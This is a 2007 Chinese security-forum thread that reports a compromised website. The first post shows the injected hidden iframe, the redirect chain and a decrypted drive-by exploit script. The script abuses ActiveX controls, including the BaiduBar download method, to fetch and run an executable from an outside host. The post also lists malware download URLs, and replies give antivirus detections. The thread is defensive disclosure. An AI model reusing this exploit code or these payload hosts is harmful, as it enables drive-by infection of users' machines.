[恶意网站播报]htp://www.xinlo.com

lovewei

卡饭网友举报一毒网http://www.xinlo.com（http://bbs.kafan.cn/viewthread.php?tid=175899&;extra=page%3D1&page=1），经测试，果然挂毒在页面顶部
<iframe src='http://free.u-uuu.cn/error.htm' width=1 height=1></iframe>
追下去
—>http://www.news991.com/photo/gift.htm —>http://www.news991.com/um/mm.html
得到的网马代码解密出来：
if(document.cookie.indexOf('OK')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("\x63\x6c\x61\x73\x73\x69\x64","\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36");var as=ado.createobject("\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();if(e!="[object Error]"){document.write('')}else{try{var f;var storm=new ActiveXObject("IERPCtl.IERPCtl.1")}catch(f){};finally{if(f!="[object Error]"){document.write('')}}try{var g;var pps=new ActiveXObject("MPS.StormPlayer")}catch(g){};finally{if(g!="[object Error]"){document.write('')}}try{var h;var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(h){};finally{if(h!="[object Error]"){document.write('')}}try{var i;var ourgame=new ActiveXObject("Pdg2")}catch(i){};finally{if(i!="[object Error]"){document.write('')}}try{var j;var storm=new ActiveXObject("PPlayer.XPPlayer.1")}catch(j){};finally{if(j!="[object Error]"){document.write('')}}try{var k;var Fuck=new ActiveXObject("BaiduBar.Tool")}catch(k){};finally{if(k!="[object Error]"){Fuck["\x44\x6c\x6f\x61\x64\x44\x53"]("http://www.uhbaidu.com/um/Baidu.cab","\x42\x61\x69\x64\x75\x2e\x65\x78\x65",0)}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"&&k=="[object Error]"){location.replace("about:blank")}}}}

主要是利用MS06014挂的百度搜霸漏洞，病毒地址：http://www.uhbaidu.com/um/Baidu.cab

初步分析：加壳类型UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
可能会感染硬盘上所有网页文件，删除GHO备份文件，关闭瑞星杀毒、卡巴斯基、macafee、nod32、VirusScan Enterprise、mcshield.exe、rav9.com、testks.com、金山毒霸、360、360safe
下载病毒文件http://www.new991.com/mmn/1.exe~13.exe
http://www.new991.com/13.exe  ,  http://www.yiwumi.cn/aa.exe

[ 本帖最后由 lovewei 于 2007-12-24 22:41 编辑 ]

tracydk

zhr5898

微点已知···
木马名称:Trojan.Win32.Genetik.evo

程序:
D:\BAIDU\BAIDU\BAIDU.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

nosferatu

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\Baidu.rar'
C:\Documents and Settings\Administrator\桌面\Baidu.rar
  [0] Archive type: RAR
  --> Baidu\BAIDU.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
      [INFO]      The file was deleted!

ytmss15

o(∩_∩)o...哈哈小A全报了

will

Win32:Delf-FKN [Trj]

yclidong

C:\Documents and Settings\Administrator\桌面\Baidu.rar &raquo; RAR &raquo; Baidu\BAIDU.exe - probably a variant of Win32/Genetik trojan

qpsr2007

小伞看来还是值得信赖的！！！

caocao

KIS
已删除：木马程序 Trojan-Downloader.Win32.Agent.gjt        文件: D:\Downloads\Baidu.rar/Baidu\BAIDU.exe//PE_Patch.UPX//UPX

lllhg1234

nis2008
扫描统计:
扫描时间: 1秒
扫描选项:
扫描目标: E:\Baidu.rar
  计数:
扫描的项目总数: 3
- 文件和目录: 3
- 注册表项: 0
- 进程和启动项: 0
- 网络和浏览器项目: 0
- 其他: 0

检测到的安全风险总数: 1
已解决的项目总数: 0
需要注意的项目总数: 1

已解决的风险:


未解决的风险:
W32.SillyDC
病毒 ID: 11498
类型: 已压缩
风险: 高 (高 隐蔽性，高 清除可能，高 性能，高 隐私)  
类别: 病毒
状态: 删除失败
-----------
1 文件
[baidu.exe] 位于[e:\baidu.rar] - 已感染